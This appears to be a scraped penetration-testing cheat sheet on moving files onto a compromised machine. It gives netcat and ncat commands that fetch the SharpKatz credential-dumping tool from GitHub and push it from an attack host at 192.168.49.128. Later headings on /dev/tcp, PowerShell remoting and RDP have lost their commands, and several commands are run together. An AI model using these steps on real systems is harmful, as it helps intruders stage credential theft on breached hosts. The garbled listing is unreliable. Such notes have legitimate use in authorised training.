Miscellaneous File Transfer Methods
Netcat
NetCat - Compromised Machine - Listening on Port 8000
nc -l -p 8000 > SharpKatz.exeNcat - Compromised Machine - Listening on Port 8000
ncat -l -p 8000 --recv-only > SharpKatz.exeNetcat - Attack Host - Sending File to Compromised machine
wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
# Example using Original Netcat
nc -q 0 192.168.49.128 8000 < SharpKatz.exewget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
# Example using Ncat
ncat --send-only 192.168.49.128 8000 < SharpKatz.exeAttack Host - Sending File as Input to Netcat
sudo nc -l -p 443 -q 0 < SharpKatz.exeCompromised Machine Connect to Netcat to Receive the File
nc 192.168.49.128 443 > SharpKatz.exeAttack Host - Sending File as Input to Ncat
Compromised Machine Connect to Ncat to Receive the File
NetCat - Sending File as Input to Netcat
Ncat - Sending File as Input to Netcat
Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File
PowerShell Session File Transfer
From DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01.
Create a PowerShell Remoting Session to DATABASE01
Copy samplefile.txt from our Localhost to the DATABASE01 Session
Copy DATABASE.txt from DATABASE01 Session to our Localhost
RDP
Mounting a Linux Folder Using rdesktop
Mounting a Linux Folder Using xfreerdp
Last updated